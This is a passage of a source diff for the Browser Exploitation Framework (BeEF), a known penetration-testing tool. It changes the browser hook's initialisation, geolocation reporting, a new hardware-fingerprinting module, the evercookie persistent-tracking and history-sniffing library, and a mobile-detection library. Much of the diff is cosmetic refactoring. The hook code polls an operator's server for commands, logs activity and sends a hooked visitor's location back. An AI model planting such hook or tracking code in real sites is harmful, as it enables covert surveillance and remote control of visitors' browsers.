-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
 * @literal object: beef.geolocation
 *
@@ -41,14 +32,14 @@ beef.geolocation = {

        $j.ajax({
            error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                beef.net.send(command_url, command_id, "latitude=" + latitude
                             + "&longitude=" + longitude
                             + "&osm=UNAVAILABLE"
                             + "&geoLocEnabled=True");
                },
            success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                var jsonResp = $j.parseJSON(data);

                beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -73,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
        navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
        		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);

 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -0,0 +1,159 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.hardware = {
+
+  ua: navigator.userAgent,
+
+  /*
+   * @return: {String} CPU type
+   **/
+  cpuType: function() {
+    // IE
+    if (typeof navigator.cpuClass != 'undefined') {
+      cpu = navigator.cpuClass;
+      if (cpu == "x86")   return "32-bit";
+      if (cpu == "68K")   return "Motorola 68K";
+      if (cpu == "PPC")   return "Motorola PPC";
+      if (cpu == "Alpha") return "Digital";
+      if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+      if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+    // Firefox
+        } else if (typeof navigator.oscpu != 'undefined') {
+      if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+    }
+    if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+    return "32-bit";
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isTouchEnabled: function() {
+    if ('ontouchstart' in document) return true;
+    return false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isVirtualMachine: function() {
+    if (screen.width % 2 || screen.height % 2) return true;
+    return false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isLaptop: function() {
+    // Most common laptop screen resolution
+    if (screen.width == 1366 && screen.height == 768) return true;
+    // Netbooks
+    if (screen.width == 1024 && screen.height == 600) return true;
+    return false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isNokia: function() {
+    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isZune: function() {
+    return (this.ua.match('ZuneWP7')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isHtc: function() {
+    return (this.ua.match('HTC')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isEricsson: function() {
+    return (this.ua.match('Ericsson')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isMotorola: function() {
+    return (this.ua.match('Motorola')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isGoogle: function() {
+    return (this.ua.match('Nexus One')) ? true : false;
+  },
+
+  /**
+   * Returns true if the browser is on a Mobile Phone
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isMobilePhone()) { ... }
+   **/
+  isMobilePhone: function() {
+    return DetectMobileQuick();
+  },
+
+  getName: function() {
+    var ua = navigator.userAgent.toLowerCase();
+    if(DetectIphone())              { return "iPhone"};
+    if(DetectIpod())                { return "iPod Touch"};
+    if(DetectIpad())                { return "iPad"};
+    if (this.isHtc())               { return 'HTC'};
+    if (this.isMotorola())          { return 'Motorola'};
+    if (this.isZune())              { return 'Zune'};
+    if (this.isGoogle())            { return 'Google Nexus One'};
+    if (this.isEricsson())          { return 'Ericsson'};
+    if(DetectAndroidPhone())        { return "Android Phone"};
+    if(DetectAndroidTablet())       { return "Android Tablet"};
+    if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+    if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+    if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+    if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+    if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+    if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+    if (this.isNokia())             { return 'Nokia'};
+    if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+    if(DetectWindowsMobile())       { return "Windows Mobile"};
+    if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+    if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+    if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+    if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+    if(DetectBlackBerry())          { return "BlackBerry"};
+    if(DetectPalmOS())              { return "Palm OS"};
+    if(DetectPalmWebOS())           { return "Palm Web OS"};
+    if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+    if(DetectArchos())              { return "Archos"}
+    if(DetectBrewDevice())          { return "Brew"};
+    if(DetectDangerHiptop())        { return "Danger Hiptop"};
+    if(DetectMaemoTablet())         { return "Maemo Tablet"};
+    if(DetectSonyMylo())            { return "Sony Mylo"};
+    if(DetectAmazonSilk())          { return "Kindle Fire"};
+    if(DetectKindle())              { return "Kindle"};
+    if(DetectSonyPlaystation())                 { return "Playstation"};
+    if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+    if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+    if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+    if(DetectXbox())                            { return "Xbox"};
+    if(this.isLaptop())                         { return "Laptop"};
+    if(this.isVirtualMachine())                 { return "Virtual Machine"};
+
+    return 'Unknown';
+  }
+};
+
+beef.regCmp('beef.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,69 +1,81 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
- 
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
-// and will have a new session id. The new session id will need to know
-// the brwoser details. So sendback the browser details again.

-BEEFHOOK=beef.session.get_hook_session_id()
+/**
+ * @literal object: beef.init
+ * Contains the beef_init() method which starts the BeEF client-side
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */

-if( beef.pageIsLoaded ) {
-  beef.net.browser_details();	
+beef.session.get_hook_session_id();
+
+if (beef.pageIsLoaded) {
+    beef.net.browser_details();
 }

-window.onload = function() {
-	beef_init();
-}
+window.onload = function () {
+    beef_init();
+};

-window.onpopstate = function(event) {
-	if(beef.onpopstate.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onpopstate.length;i++){
-				var callback = beef.onpopstate[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onpopstate - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onpopstate = function (event) {
+    if (beef.onpopstate.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onpopstate.length; i++) {
+            var callback = beef.onpopstate[i];
+            try {
+                callback(event);
+            } catch (e) {
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};

-window.onclose = function(event) {
-	if(beef.onclose.length > 0) {
-			event.preventDefault;
-			for(var i=0;i<beef.onclose.length;i++){
-				var callback = beef.onclose[i];
-				try{
-					callback(event);
-				}catch(e){
-					console.log("window.onclose - couldn't execute callback: " + e.message);
-				}
-			return false;
-		}
-	}
-}
+window.onclose = function (event) {
+    if (beef.onclose.length > 0) {
+        event.preventDefault;
+        for (var i = 0; i < beef.onclose.length; i++) {
+            var callback = beef.onclose[i];
+            try {
+                callback(event);
+            } catch (e) {
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
+            }
+            return false;
+        }
+    }
+};

+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
-  if (!beef.pageIsLoaded) {
-    beef.pageIsLoaded = true;
-	beef.net.browser_details()
-    beef.updater.execute_commands();
-    beef.updater.check();
-    beef.logger.start();
-  }
+    if (!beef.pageIsLoaded) {
+        beef.pageIsLoaded = true;
+        if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
+            beef.websocket.start();
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.logger.start();
+            beef.are.init();
+        }else {
+            beef.net.browser_details();
+            beef.updater.execute_commands();
+            beef.updater.check();
+            beef.logger.start();
+            beef.are.init();
+        }
+    }
 }
--- a/core/main/client/lib/browser_jools.js
+++ b/core/main/client/lib/browser_jools.js
--- a/core/main/client/lib/deployJava.js
+++ b/core/main/client/lib/deployJava.js
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*
 * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
 *
@@ -158,14 +149,14 @@ this.get = function(name, cb, dont_reset)
 	$(document).ready(function() {
 		self._evercookie(name, cb, undefined, undefined, dont_reset);
 	});
-}
+};

 this.set = function(name, value)
 {
 	$(document).ready(function() {
 			self._evercookie(name, function() { }, value);
 	});
-}
+};

 this._evercookie = function(name, cb, value, i, dont_reset)
 {
@@ -273,7 +264,7 @@ this._evercookie = function(name, cb, value, i, dont_reset)
 				cb(candidate, tmpec);
 		}
 	}
-}
+};

 this.evercookie_window = function(name, value)
 {
@@ -283,7 +274,7 @@ this.evercookie_window = function(name, value)
 		else
 			return this.getFromStr(name, window.name);
 	} catch(e) { }
-}
+};

 this.evercookie_userdata = function(name, value)
 {
@@ -302,7 +293,7 @@ this.evercookie_userdata = function(name, value)
 			return elm.getAttribute(name);
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_cache = function(name, value)
 {
@@ -335,7 +326,7 @@ this.evercookie_cache = function(name, value)
 			}
 		});
 	}
-}
+};

 this.evercookie_etag = function(name, value)
 {
@@ -368,7 +359,7 @@ this.evercookie_etag = function(name, value)
 			}
 		});
 	}
-}
+};

 this.evercookie_lso = function(name, value)
 {
@@ -390,7 +381,7 @@ this.evercookie_lso = function(name, value)
 	attributes.id        = "myswf";
 	attributes.name      = "myswf";
 	swfobject.embedSWF("evercookie.swf", "swfcontainer", "1", "1", "9.0.0", false, flashvars, params, attributes);
-}
+};

 this.evercookie_png = function(name, value)
 {
@@ -453,7 +444,7 @@ this.evercookie_png = function(name, value)
 			}	
 		}
 	}
-}
+};

 this.evercookie_local_storage = function(name, value)
 {
@@ -468,7 +459,7 @@ this.evercookie_local_storage = function(name, value)
 		}
 	}
 	catch (e) { }
-}
+};

 this.evercookie_database_storage = function(name, value)
 {
@@ -506,7 +497,7 @@ this.evercookie_database_storage = function(name, value)
 			}
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_session_storage = function(name, value)
 {
@@ -520,7 +511,7 @@ this.evercookie_session_storage = function(name, value)
 				return sessionStorage.getItem(name);
 		}
 	} catch(e) { }
-}
+};

 this.evercookie_global_storage = function(name, value)
 {
@@ -536,7 +527,7 @@ this.evercookie_global_storage = function(name, value)
 				return eval("globalStorage[host]." + name);
 		} catch(e) { }
 	}
-}
+};
 this.evercookie_silverlight = function(name, value) {
    /*
     * Create silverlight embed
@@ -566,7 +557,7 @@ this.evercookie_silverlight = function(name, value) {
            '</a>' +
        '</object>';
        document.body.innerHTML+=html;
-}
+};

 // public method for encoding
 this.encode = function (input) {
@@ -600,7 +591,7 @@ this.encode = function (input) {
 	}

 	return output;
-}
+};

 // public method for decoding
 this.decode = function (input) {
@@ -636,7 +627,7 @@ this.decode = function (input) {

 	return output;

-}
+};

 // private method for UTF-8 encoding
 this._utf8_encode = function (string) {
@@ -663,7 +654,7 @@ this._utf8_encode = function (string) {
 	}

 	return utftext;
-}
+};

 // private method for UTF-8 decoding
 this._utf8_decode = function (utftext) {
@@ -694,7 +685,7 @@ this._utf8_decode = function (utftext) {
 	}

 	return string;
-}
+};

 // this is crazy but it's 4am in dublin and i thought this would be hilarious
 // blame the guinness
@@ -759,7 +750,7 @@ this.evercookie_history = function(name, value)
 			return this.decode(val);
 		}
 	}
-}
+};

 this.createElem = function(type, name, append)
 {
@@ -778,14 +769,14 @@ this.createElem = function(type, name, append)
 		document.body.appendChild(el);

 	return el;
-}
+};

 this.createIframe = function(url, name)
 {
 	var el = this.createElem('iframe', name, 1);
 	el.setAttribute('src', url);
 	return el;
-}
+};

 // wait for our swfobject to appear (swfobject.js to load)
 this.waitForSwf = function(i)
@@ -798,19 +789,24 @@ this.waitForSwf = function(i)
 	// wait for ~2 seconds for swfobject to appear
 	if (i < _ec_tests && typeof swfobject == 'undefined')
 		setTimeout(function() { waitForSwf(i) }, 300);
-}
+};

 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
-	{
-		// expire the cookie first
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	}
-	else
-		return this.getFromStr(name, document.cookie);
-}
+    try{
+        if (typeof(value) != "undefined")
+        {
+            // expire the cookie first
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+        }
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
+};

 // get value from param-like string (eg, "x=y&name=VALUE")
 this.getFromStr = function(name, text)
@@ -828,7 +824,7 @@ this.getFromStr = function(name, text)
 		if (c.indexOf(nameEQ) == 0)
 			return c.substring(nameEQ.length, c.length);
 	}
-}
+};

 this.getHost = function()
 {
@@ -836,7 +832,7 @@ this.getHost = function()
 	if (domain.indexOf('www.') == 0)
 		domain = domain.replace('www.', '');
 	return domain;
-}
+};

 this.toHex = function(str)
 {
@@ -852,7 +848,7 @@ this.toHex = function(str)
        r += h;
    }
    return r;
-}
+};

 this.fromHex = function(str)
 {
@@ -866,7 +862,7 @@ this.fromHex = function(str)
        e = s;
    }
    return r;
-}
+};

 /* 
 * css history knocker (determine what sites your visitors have been to)
@@ -901,7 +897,7 @@ this.hasVisited = function(url)
 		this._testURL("https://" + url, this.no_color) ||
 		this._testURL("http://www." + url, this.no_color) ||
 		this._testURL("https://www." + url, this.no_color);
-}
+};

 /* create our anchor tag */
 var _link = this.createElem('a', '_ec_rgb_link');
@@ -930,30 +926,28 @@ try {
 }

 /* if test_color, return -1 if we can't set a style */
-this._getRGB = function(u, test_color)
-{
-	if (test_color && created_style == 0)
-		return -1;
+this._getRGB = function (u, test_color) {
+    if (test_color && created_style == 0)
+        return -1;

-	/* create the new anchor tag with the appropriate URL information */
-	_link.href = u;
-	_link.innerHTML = u;
-	// not sure why, but the next two appendChilds always have to happen vs just once
-	document.body.appendChild(style);
-	document.body.appendChild(_link);
-	
-	/* add the link to the DOM and save the visible computed color */
-	var color;
-	if (document.defaultView)
-		color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
-	else
-		color = _link.currentStyle['color'];
+    /* create the new anchor tag with the appropriate URL information */
+    _link.href = u;
+    _link.innerHTML = u;
+    // not sure why, but the next two appendChilds always have to happen vs just once
+    document.body.appendChild(style);
+    document.body.appendChild(_link);

-	return color;
-}
+    /* add the link to the DOM and save the visible computed color */
+    var color;
+    if (document.defaultView)
+        color = document.defaultView.getComputedStyle(_link, null).getPropertyValue('color');
+    else
+        color = _link.currentStyle['color'];

-this._testURL = function(url, no_color)
-{
+    return color;
+};
+
+this._testURL = function(url, no_color){
 	var color = this._getRGB(url);

 	/* check to see if the link has been visited if the computed color is red */
--- a/core/main/client/lib/jools.min.js
+++ b/core/main/client/lib/jools.min.js
--- a/core/main/client/lib/jquery-1.10.2.min.js
+++ b/core/main/client/lib/jquery-1.10.2.min.js
--- a/core/main/client/lib/jquery-migrate-1.2.1.min.js
+++ b/core/main/client/lib/jquery-migrate-1.2.1.min.js
--- a/core/main/client/lib/mdetect.js
+++ b/core/main/client/lib/mdetect.js
@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
